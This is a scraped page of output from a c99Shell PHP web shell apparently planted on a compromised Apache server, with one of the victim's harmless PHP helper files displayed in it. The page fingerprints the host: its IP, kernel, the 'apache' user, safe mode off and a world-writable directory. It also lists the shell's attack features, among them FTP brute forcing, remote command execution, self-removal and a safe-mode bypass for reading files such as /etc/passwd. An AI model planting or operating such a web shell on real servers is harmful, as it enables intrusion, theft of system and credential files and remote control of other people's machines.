110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/mis2222/application/helpers/ drwxrwxrwx Free 50.65 GB of 127.8 GB (39.63%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/mis2222/application/helpers/ drwxrwxrwx
Free 50.65 GB of 127.8 GB (39.63%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


<?php 
/* CRUD */
function CRUD($link, $act){

    if (strpos("01",$act)===false) die("ชนิดของ Link ต้องเป็น0 1 เท่านั้น");
    $flg = false;
    if ($act){
        return  $link;
    }else{
        $link=trim($link);            
        $s = strtolower($link);
        //----------------------------------------------------------------
        //find image name
        //            $input="images/del.gif";
        //            $output = "images/delgrey.gif";        // use explode fn
        //            $this->createGreyFromGifJpg($input, $output);
        //---------------------------------------------------------------
        //rename imagename.gif to imagenamegrey.gif
        $pGif = strpos($s,".gif");
        if ($pGif===false){
        }else{
            $ss = substr_replace($link, "grey", $pGif).substr($link, $pGif);
            $link = $ss;
            $s = strtolower($link);
        }

        //rename imagename.jpg to imagenamegrey.jpg
        $pJpg = strpos($s,".jp");
        if ($pJpg===false){
        }else{
            $ss = substr_replace($link, "grey", $pJpg).substr($link, $pJpg);
            $link = $ss;
            $s = strtolower($link);
        }            
        //add disabled to input tag
        $pos = strpos($s,"input");
        if ($pos===false){
        }else{
            $ss = substr_replace($link, "input disabled", $pos).substr($link, $pos+5);
            $link = $ss;
            $s = strtolower($link);
        }
        //change onclick-->onklick
        $pOnClick = strpos($s,"onclick");
        if ($pOnClick===false){
        }else{
            $ss = substr_replace($link, "onklick", $pOnClick).substr($link, $pOnClick+7);
            $link = $ss;
            $s = strtolower($link);                
        }
        ////////////
        //disable tag A 
        $pHref = strpos($s,"href");
        if ($pHref===false){
        }else{
            $ss = substr_replace($link, "href1", $pHref).substr($link, $pHref+4);
            $link = $ss;
            $s = strtolower($link);
        }
        
        // disable anchor
        $pAnc = strpos($s,"anchor");
        if ($pAnc===false){
        }else{
            $pAnchor = strpos($s,"<img");
            $ss = substr($s, $pAnchor);
            $pBAnchor = strpos($ss,"/>");
            $link = substr($ss,0,$pBAnchor);
            $s = strtolower($link);
        }

        //disable text between tag A and not have tag img 
        $pImg = strpos($s,"<img")===false;
        if ($pImg===false){            
            if (substr($s,0,2)=="<a"){
                $p1 = strpos($link,">");
                $p2 = strpos($link,"</");
                $ss = "<font color=#999999>".substr($link, $p1+1,$p2)."</font>";
                $link =  $ss;
                $s = strtolower($link);
            }
        }
        return $link;
    }
}

?>

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Command execute ::
Enter:	Select: